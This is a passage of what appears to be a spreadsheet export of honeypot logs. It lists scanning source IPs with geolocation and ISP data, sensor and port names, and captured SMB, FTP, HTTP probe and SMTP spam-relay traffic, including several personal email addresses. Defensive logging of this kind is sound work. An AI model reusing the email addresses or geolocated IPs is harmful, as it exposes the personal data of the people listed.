    <t>RADIOLAN</t>
  </si>
  <si>
    <t>2013-04-03</t>
  </si>
  <si>
    <t>::ffff:b916:d502</t>
  </si>
  <si>
    <t>685ce725f2cd0b636ccdbdd4b3f1b9b4</t>
  </si>
  <si>
    <t>60.251.191.212</t>
  </si>
  <si>
    <t>60-251-191-212.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_SMB_H25&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H32</t>
  </si>
  <si>
    <t>445&amp;&amp;48020&amp;&amp;5900</t>
  </si>
  <si>
    <t>2006-07-31</t>
  </si>
  <si>
    <t>::ffff:3cfb:bfd4</t>
  </si>
  <si>
    <t>38b703faaa1a97dd9e739eba6cd674e5</t>
  </si>
  <si>
    <t>49.49.184.119</t>
  </si>
  <si>
    <t>Phra Nakhon Si Ayutthaya</t>
  </si>
  <si>
    <t>1607532</t>
  </si>
  <si>
    <t>14.3517</t>
  </si>
  <si>
    <t>100.577</t>
  </si>
  <si>
    <t>::ffff:3131:b877</t>
  </si>
  <si>
    <t>1d0dfb9eb03e0a6243a4afbb4d2cbb22</t>
  </si>
  <si>
    <t>59.92.161.93</t>
  </si>
  <si>
    <t>::ffff:3b5c:a15d</t>
  </si>
  <si>
    <t>81ec9987b381c0cce635ef0d031009a8</t>
  </si>
  <si>
    <t>152.58.27.207</t>
  </si>
  <si>
    <t>Gwalior District</t>
  </si>
  <si>
    <t>Morār</t>
  </si>
  <si>
    <t>1262783</t>
  </si>
  <si>
    <t>26.2264</t>
  </si>
  <si>
    <t>78.2248</t>
  </si>
  <si>
    <t>::ffff:983a:1bcf</t>
  </si>
  <si>
    <t>42213ebdf38d893e7d88112fb27f2aa6</t>
  </si>
  <si>
    <t>103.112.32.20</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_FTP_H25&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;21&amp;&amp;80&amp;&amp;41316&amp;&amp;1433&amp;&amp;3306&amp;&amp;445</t>
  </si>
  <si>
    <t>Hingoli</t>
  </si>
  <si>
    <t>Hingoli (Ramakrishna Nagar)</t>
  </si>
  <si>
    <t>1270072</t>
  </si>
  <si>
    <t>431513</t>
  </si>
  <si>
    <t>19.7449</t>
  </si>
  <si>
    <t>77.1555</t>
  </si>
  <si>
    <t>Ajay Cable And Broadband Services Opc Pvt. Ltd</t>
  </si>
  <si>
    <t>Ajay Cable And Broadband Services Opc Pvt. Ltd.</t>
  </si>
  <si>
    <t>2018-03-22</t>
  </si>
  <si>
    <t>ACBSPL</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (103.112.32.20,51890)}&amp;&amp;{Data_SMB:Incoming connection (103.112.32.20,52677)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:6770:2014</t>
  </si>
  <si>
    <t>b9d34a3068d0981e277c9a41c3061ef4</t>
  </si>
  <si>
    <t>117.192.183.84</t>
  </si>
  <si>
    <t>::ffff:75c0:b754</t>
  </si>
  <si>
    <t>84e8738a17dee37c06ddafbda08b9591</t>
  </si>
  <si>
    <t>120.57.86.85</t>
  </si>
  <si>
    <t>::ffff:7839:5655</t>
  </si>
  <si>
    <t>add0d9311a0347ea352e0a6de93e2b2f</t>
  </si>
  <si>
    <t>117.207.128.46</t>
  </si>
  <si>
    <t>::ffff:75cf:802e</t>
  </si>
  <si>
    <t>0a02adedb04368b2489e2f28f718a868</t>
  </si>
  <si>
    <t>117.207.232.224</t>
  </si>
  <si>
    <t>::ffff:75cf:e8e0</t>
  </si>
  <si>
    <t>79d9de8f4ee9bf171c0e1aa68d54800b</t>
  </si>
  <si>
    <t>103.88.56.22</t>
  </si>
  <si>
    <t>Latur</t>
  </si>
  <si>
    <t>Ausa</t>
  </si>
  <si>
    <t>1278139</t>
  </si>
  <si>
    <t>18.2473</t>
  </si>
  <si>
    <t>76.4993</t>
  </si>
  <si>
    <t>Nddr</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.88.56.22,59084)}&amp;&amp;{Data_SMB:Incoming connection (103.88.56.22,59477)}</t>
  </si>
  <si>
    <t>::ffff:6758:3816</t>
  </si>
  <si>
    <t>bc443a3b2ee2f570fedb1e021d23b069</t>
  </si>
  <si>
    <t>117.205.149.241</t>
  </si>
  <si>
    <t>::ffff:75cd:95f1</t>
  </si>
  <si>
    <t>f1ed9ee446d3c3d5c05b3120b875a495</t>
  </si>
  <si>
    <t>103.246.194.146</t>
  </si>
  <si>
    <t>2015-11-05</t>
  </si>
  <si>
    <t>::ffff:67f6:c292</t>
  </si>
  <si>
    <t>101caab23189dedc9351e5627d9a5784</t>
  </si>
  <si>
    <t>103.162.160.10</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_LDAP_H33&amp;&amp;SMA-LAB_SMB_H42&amp;&amp;SMA-LAB_PJL_H45&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_NTP_H13&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_DNS_H5&amp;&amp;SMA-LAB_SSH_H17&amp;&amp;SMA-LAB_HTTPS_H25&amp;&amp;SMA-LAB_SOCKS5_H45&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;389&amp;&amp;445&amp;&amp;9100&amp;&amp;5900&amp;&amp;123&amp;&amp;80&amp;&amp;53&amp;&amp;22&amp;&amp;443&amp;&amp;1080&amp;&amp;61949&amp;&amp;3306</t>
  </si>
  <si>
    <t>Pānchgani</t>
  </si>
  <si>
    <t>1260577</t>
  </si>
  <si>
    <t>17.8882</t>
  </si>
  <si>
    <t>73.8566</t>
  </si>
  <si>
    <t>141533</t>
  </si>
  <si>
    <t>J K Connect</t>
  </si>
  <si>
    <t>2021-02-05</t>
  </si>
  <si>
    <t>JKCONN</t>
  </si>
  <si>
    <t>::ffff:67a2:a00a</t>
  </si>
  <si>
    <t>1d0cf4758a8a01b24693a470441e2572</t>
  </si>
  <si>
    <t>103.171.246.120</t>
  </si>
  <si>
    <t>Dinajpur Dakshin</t>
  </si>
  <si>
    <t>Daulatpur</t>
  </si>
  <si>
    <t>1273379</t>
  </si>
  <si>
    <t>25.326</t>
  </si>
  <si>
    <t>88.3299</t>
  </si>
  <si>
    <t>::ffff:67ab:f678</t>
  </si>
  <si>
    <t>080c184e9fda3ae9cfdd252f8ccb8dd4</t>
  </si>
  <si>
    <t>120.61.170.208</t>
  </si>
  <si>
    <t>::ffff:783d:aad0</t>
  </si>
  <si>
    <t>4dccdcdea1759f1e49afcfc1d627bfa8</t>
  </si>
  <si>
    <t>119.202.13.134</t>
  </si>
  <si>
    <t>Uljin County</t>
  </si>
  <si>
    <t>Uljin County (Jukbyeon-myeon)</t>
  </si>
  <si>
    <t>1833762</t>
  </si>
  <si>
    <t>37.0598</t>
  </si>
  <si>
    <t>129.422</t>
  </si>
  <si>
    <t>::ffff:77ca:d86</t>
  </si>
  <si>
    <t>8aa5731fc89a3132a2b47929ee28d56c</t>
  </si>
  <si>
    <t>183.83.51.156</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (183.83.51.156,61029)}&amp;&amp;{Data_SMB:Incoming connection (183.83.51.156,61911)}</t>
  </si>
  <si>
    <t>::ffff:b753:339c</t>
  </si>
  <si>
    <t>08935002750a4a8fffb8cc58e197e110</t>
  </si>
  <si>
    <t>103.219.140.154</t>
  </si>
  <si>
    <t>SMA-LAB_SMB_H29&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>Faridabad (Sector 21C)</t>
  </si>
  <si>
    <t>28.4314</t>
  </si>
  <si>
    <t>77.296</t>
  </si>
  <si>
    <t>134316</t>
  </si>
  <si>
    <t>AXN Telecom</t>
  </si>
  <si>
    <t>2016-05-18</t>
  </si>
  <si>
    <t>AXNTEL</t>
  </si>
  <si>
    <t>{Data_SMB:Incoming connection (103.219.140.154,55989)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.219.140.154,53075)}&amp;&amp;{Data_SMB:Incoming connection (103.219.140.154,53671)}</t>
  </si>
  <si>
    <t>::ffff:67db:8c9a</t>
  </si>
  <si>
    <t>c5293bfd498433275a1f92877c9f4022</t>
  </si>
  <si>
    <t>115.245.91.110</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_DNS_H1&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;27734&amp;&amp;53&amp;&amp;49809&amp;&amp;1433</t>
  </si>
  <si>
    <t>::ffff:73f5:5b6e</t>
  </si>
  <si>
    <t>06197f1611ef607a300ddb0265512abf</t>
  </si>
  <si>
    <t>189.129.251.8</t>
  </si>
  <si>
    <t>GUA</t>
  </si>
  <si>
    <t>Guanajuato</t>
  </si>
  <si>
    <t>León</t>
  </si>
  <si>
    <t>Fraccionamiento Paraíso Real</t>
  </si>
  <si>
    <t>8859563</t>
  </si>
  <si>
    <t>21.1125</t>
  </si>
  <si>
    <t>-101.581</t>
  </si>
  <si>
    <t>{Data_SMB:Incoming connection (189.129.251.8,62691)}&amp;&amp;{Data_SMB:Incoming connection (189.129.251.8,62872)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (189.129.251.8,61485)}&amp;&amp;{Data_SMB:Incoming connection (189.129.251.8,61822)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:bd81:fb08</t>
  </si>
  <si>
    <t>f0040a8f98e742cc5745572a7d4676a5</t>
  </si>
  <si>
    <t>49.37.242.124</t>
  </si>
  <si>
    <t>::ffff:3125:f27c</t>
  </si>
  <si>
    <t>94294d68f9a13159dac231aad144d43d</t>
  </si>
  <si>
    <t>115.96.138.183</t>
  </si>
  <si>
    <t>::ffff:7360:8ab7</t>
  </si>
  <si>
    <t>98bbf9707cdcc77c39613c9ce22cab5e</t>
  </si>
  <si>
    <t>59.93.140.83</t>
  </si>
  <si>
    <t>::ffff:3b5d:8c53</t>
  </si>
  <si>
    <t>b305bc4cacb56b57eb7b89eb458b8d2f</t>
  </si>
  <si>
    <t>160.25.212.1</t>
  </si>
  <si>
    <t>Kota Batam</t>
  </si>
  <si>
    <t>Batam</t>
  </si>
  <si>
    <t>6295587</t>
  </si>
  <si>
    <t>1.12873</t>
  </si>
  <si>
    <t>104.055</t>
  </si>
  <si>
    <t>59142</t>
  </si>
  <si>
    <t>Pemerintah Kota Batam</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (160.25.212.1,64491)}</t>
  </si>
  <si>
    <t>::ffff:a019:d401</t>
  </si>
  <si>
    <t>1e4f0dcbf2c8a09ba2a7b264e012588b</t>
  </si>
  <si>
    <t>114.33.117.159</t>
  </si>
  <si>
    <t>NA&amp;&amp;114-33-117-159.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_PJL_H43&amp;&amp;SMA-LAB_PJL_HC1</t>
  </si>
  <si>
    <t>9100&amp;&amp;80</t>
  </si>
  <si>
    <t>{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:7221:759f</t>
  </si>
  <si>
    <t>1e19c2b4a5ced4077cf3dcc8516c988f</t>
  </si>
  <si>
    <t>49.43.248.141</t>
  </si>
  <si>
    <t>SMA-LAB_LDAP_H11&amp;&amp;SMA-LAB_LDAP_HC1</t>
  </si>
  <si>
    <t>Manali</t>
  </si>
  <si>
    <t>1263968</t>
  </si>
  <si>
    <t>13.1667</t>
  </si>
  <si>
    <t>80.2667</t>
  </si>
  <si>
    <t>::ffff:312b:f88d</t>
  </si>
  <si>
    <t>d03dce1e10303301cbe7a882211d6aec</t>
  </si>
  <si>
    <t>45.121.216.18</t>
  </si>
  <si>
    <t>-6.20321</t>
  </si>
  <si>
    <t>PT. Mora Telematika Indonesia</t>
  </si>
  <si>
    <t>::ffff:2d79:d812</t>
  </si>
  <si>
    <t>aba15454944b14947c6ebe8344aec04c</t>
  </si>
  <si>
    <t>59.182.126.237</t>
  </si>
  <si>
    <t>Thiruvananthapuram</t>
  </si>
  <si>
    <t>8.4855</t>
  </si>
  <si>
    <t>76.9492</t>
  </si>
  <si>
    <t>::ffff:3bb6:7eed</t>
  </si>
  <si>
    <t>8d3948e2230f8d1c8c6cd95eb915abdd</t>
  </si>
  <si>
    <t>116.81.26.199</t>
  </si>
  <si>
    <t>199.26.81.116.megaegg.ne.jp&amp;&amp;NA</t>
  </si>
  <si>
    <t>Hiroshima</t>
  </si>
  <si>
    <t>Hatsukaichi-shi</t>
  </si>
  <si>
    <t>Hatsukaichi</t>
  </si>
  <si>
    <t>1863018</t>
  </si>
  <si>
    <t>34.35</t>
  </si>
  <si>
    <t>132.333</t>
  </si>
  <si>
    <t>18144</t>
  </si>
  <si>
    <t>Enecom,Inc.</t>
  </si>
  <si>
    <t>Enecom, Inc.</t>
  </si>
  <si>
    <t>Energia Communications, Inc.</t>
  </si>
  <si>
    <t>::ffff:7451:1ac7</t>
  </si>
  <si>
    <t>3870c5dcdacc8269c6235acb7f34475f</t>
  </si>
  <si>
    <t>117.251.178.100</t>
  </si>
  <si>
    <t>::ffff:75fb:b264</t>
  </si>
  <si>
    <t>e87b3f9a07e98b6b55b8bbb7645f9d64</t>
  </si>
  <si>
    <t>202.79.26.27</t>
  </si>
  <si>
    <t>{'zen.spamhaus.org': ['exploits'&amp;&amp; 'spam']}</t>
  </si>
  <si>
    <t>Chamkar Mon</t>
  </si>
  <si>
    <t>11.538499999999999</t>
  </si>
  <si>
    <t>104.921</t>
  </si>
  <si>
    <t>24492</t>
  </si>
  <si>
    <t>WiCAM Corporation Ltd.</t>
  </si>
  <si>
    <t>100 95th Street, Group</t>
  </si>
  <si>
    <t>2005-11-17</t>
  </si>
  <si>
    <t>DiamondWeb</t>
  </si>
  <si>
    <t>::ffff:ca4f:1a1b</t>
  </si>
  <si>
    <t>8bb957303177f5948982067600cf705c</t>
  </si>
  <si>
    <t>117.254.30.31</t>
  </si>
  <si>
    <t>::ffff:75fe:1e1f</t>
  </si>
  <si>
    <t>56216c267c5f87a2e40f9a034986bc87</t>
  </si>
  <si>
    <t>211.232.173.178</t>
  </si>
  <si>
    <t>Guri-si (Seongnae-ro 6-gil)</t>
  </si>
  <si>
    <t>37.5288</t>
  </si>
  <si>
    <t>17877</t>
  </si>
  <si>
    <t>KX NexG Co., LTD</t>
  </si>
  <si>
    <t>Vaan</t>
  </si>
  <si>
    <t>{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000D_
To: spameri@tiscali.it_x000D_
Date: Mon, 17 Mar 2025 18:08:52 +0900_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;edemlea52@gmail.com&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;edemlea52@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;lea_edem12@hotmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;leaedem13@outlook.fr&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;m_lewis.41@yahoo.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;nicholas_mavis@yahoo.co.uk&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:d3e8:adb2</t>
  </si>
  <si>
    <t>7b5f36cb88250c9616eaf8dd8a388c1d</t>
  </si>
  <si>
    <t>115.187.40.74</t>
  </si>
  <si>
    <t>Rishra</t>
  </si>
  <si>
    <t>1258126</t>
  </si>
  <si>
    <t>22.7239</t>
  </si>
  <si>
    <t>88.3456</t>
  </si>
  <si>
    <t>::ffff:73bb:284a</t>
  </si>
  <si>
    <t>f96926c03750728f6914d69c47c2de7b</t>
  </si>
  <si>
    <t>202.46.26.37</t>
  </si>
  <si>
    <t>::ffff:ca2e:1a25</t>
  </si>
  <si>
    <t>fc5820846d4376d378ffa37dfc065a1b</t>
  </si>
  <si>
    <t>211.35.143.88</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_FTP_H45&amp;&amp;SMA-LAB_FTP_H39&amp;&amp;SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_FTP_H23&amp;&amp;SMA-LAB_FTP_H9</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;21&amp;&amp;36567&amp;&amp;57883&amp;&amp;57915&amp;&amp;57940&amp;&amp;57998&amp;&amp;51007&amp;&amp;51068&amp;&amp;65291</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'korea.services.net': ['unknown']&amp;&amp; 'spamsources.fabel.dk': ['unknown']}</t>
  </si>
  <si>
    <t>1999-08-27</t>
  </si>
  <si>
    <t>connection&amp;&amp;login&amp;&amp;command&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}&amp;&amp;{Data_FTP:NA}</t>
  </si>
  <si>
    <t>::ffff:d323:8f58</t>
  </si>
  <si>
    <t>d34c23b89b9eed2dd30acff5e153e557</t>
  </si>
  <si>
    <t>147.185.133.87</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_POP3_HC1&amp;&amp;SMA-LAB_HTTP_H16</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23140&amp;&amp;37033&amp;&amp;80&amp;&amp;110&amp;&amp;57084&amp;&amp;443&amp;&amp;56403&amp;&amp;56205&amp;&amp;55917&amp;&amp;52361</t>
  </si>
  <si>
    <t>connection&amp;&amp;command&amp;&amp;GET&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08	
x0bx0c_x000D_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '/ HTTP/1.1', 'cmd': 'GET'}}&amp;&amp;{Data_POP3:{'args': '103.211.202.140:110', 'cmd': 'Host:'}}&amp;&amp;{Data_POP3:{'args': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'cmd': 'User-Agent:'}}&amp;&amp;{Data_POP3:{'args': 'gzip', 'cmd': 'Accept-Encoding:'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': ''}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_POP3:{'args': '5.253.43.207:110', 'cmd': 'Host:'}}</t>
  </si>
  <si>
    <t>::ffff:93b9:8557</t>
  </si>
  <si>
    <t>9103053581352a708a1675ff4e764cc0</t>
  </si>
  <si>
    <t>175.206.253.5</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>30338&amp;&amp;23</t>
  </si>
  <si>
    <t>::ffff:afce:fd05</t>
  </si>
  <si>
    <t>f66343b167cbfe08e8a832ec0c84da1f</t>
  </si>
  <si>
    <t>117.241.181.85</t>
  </si>
  <si>
    <t>::ffff:75f1:b555</t>
  </si>
  <si>
    <t>fe6a2b5c8f23eee67462812639b5ba52</t>
  </si>
  <si>
    <t>88.87.57.74</t>
  </si>
  <si>
    <t>12552</t>
  </si>
  <si>
    <t>GlobalConnect AB</t>
  </si>
  <si>
    <t>Viasat Satellite Services AB</t>
  </si>
  <si>
    <t>::ffff:5857:394a</t>
  </si>
  <si>
    <t>ed580e996ea7a23b7be0997bc4f05acc</t>
  </si>
  <si>
    <t>60.249.252.249</t>
  </si>
  <si>
    <t>60-249-252-249.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H14&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H12</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;8685&amp;&amp;23&amp;&amp;80&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3cf9:fcf9</t>
  </si>
  <si>
    <t>e28a484b66a86be6bd37159c9b6bda77</t>
  </si>
  <si>
    <t>122.165.204.210</t>
  </si>
  <si>
    <t>SMA-LAB_NTP_H25&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_SOCKS5_H46&amp;&amp;SMA-LAB_SSH_H31&amp;&amp;SMA-LAB_IPP_H35&amp;&amp;SMA-LAB_LDAP_H14&amp;&amp;SMA-LAB_SMB_H7&amp;&amp;SMA-LAB_HTTPS_H15&amp;&amp;SMA-LAB_HTTP_H42&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13</t>
  </si>
  <si>
    <t>123&amp;&amp;5900&amp;&amp;1080&amp;&amp;22&amp;&amp;631&amp;&amp;389&amp;&amp;445&amp;&amp;443&amp;&amp;80&amp;&amp;56815&amp;&amp;3306&amp;&amp;1433</t>
  </si>
  <si>
    <t>::ffff:7aa5:ccd2</t>
  </si>
  <si>
    <t>33a6f89425d212959e22e2d61426cfa0</t>
  </si>
  <si>
    <t>125.163.33.197</t>
  </si>
  <si>
    <t>-6.91746</t>
  </si>
  <si>
    <t>107.619</t>
  </si>
  <si>
    <t>::ffff:7da3:21c5</t>
  </si>
  <si>
    <t>9b1de33ac4fdf166ea1b2c7a33ca00b1</t>
  </si>
  <si>
    <t>160.19.17.34</t>
  </si>
  <si>
    <t>2.98084</t>
  </si>
  <si>
    <t>99.7969</t>
  </si>
  <si>
    <t>152073</t>
  </si>
  <si>
    <t>PT Media Balai Nusa</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:a013:1122</t>
  </si>
  <si>
    <t>806674f63f0fb00e05f7e076ccc1cde7</t>
  </si>
  <si>
    <t>115.96.254.247</t>
  </si>
  <si>
    <t>::ffff:7360:fef7</t>
  </si>
  <si>
    <t>301534f9c18b2588ca1983fba7f895e1</t>
  </si>
  <si>
    <t>182.253.182.5</t>
  </si>
  <si>
    <t>Jimbaran</t>
  </si>
  <si>
    <t>1642467</t>
  </si>
  <si>
    <t>-8.79093</t>
  </si>
  <si>
    <t>115.16</t>
  </si>
  <si>
    <t>17451</t>
  </si>
  <si>
    <t>BIZNET NETWORKS</t>
  </si>
  <si>
    <t>::ffff:b6fd:b605</t>
  </si>
  <si>
    <t>26dfd2c133826b6eedfc1fef33de0c1d</t>
  </si>
  <si>
    <t>117.247.30.158</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H28</t>
  </si>
  <si>
    <t>23&amp;&amp;45826</t>
  </si>
  <si>
    <t>::ffff:75f7:1e9e</t>
  </si>
  <si>
    <t>c7613576cdd9c0690beb59236faf42ba</t>
  </si>
  <si>
    <t>174.66.138.42</t>
  </si>
  <si>
    <t>ip174-66-138-42.sd.sd.cox.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>Bonita</t>
  </si>
  <si>
    <t>5329954</t>
  </si>
  <si>
    <t>91908</t>
  </si>
  <si>
    <t>32.6578</t>
  </si>
  <si>
    <t>-117.03</t>
  </si>
  <si>
    <t>::ffff:ae42:8a2a</t>
  </si>
  <si>
    <t>85657ce5b1d440f34bb400e942dc44d2</t>
  </si>
  <si>
    <t>94.103.188.118</t>
  </si>
  <si>
    <t>46.9895</t>
  </si>
  <si>
    <t>28.8602</t>
  </si>
  <si>
    <t>200019</t>
  </si>
  <si>
    <t>ALEXHOST SRL</t>
  </si>
  <si>
    <t>Alexhost SRL</t>
  </si>
  <si>
    <t>::ffff:5e67:bc76</t>
  </si>
  <si>
    <t>a151bbac378ad76be3ef8a637d711860</t>
  </si>
  <si>
    <t>117.221.112.34</t>
  </si>
  <si>
    <t>::ffff:75dd:7022</t>
  </si>
  <si>
    <t>e4e4622d6444350fe3d93f91c8584e12</t>
  </si>
  <si>
    <t>118.141.164.87</t>
  </si>
  <si>
    <t>HUTCHISON-AS-AP</t>
  </si>
  <si>
    <t>::ffff:768d:a457</t>
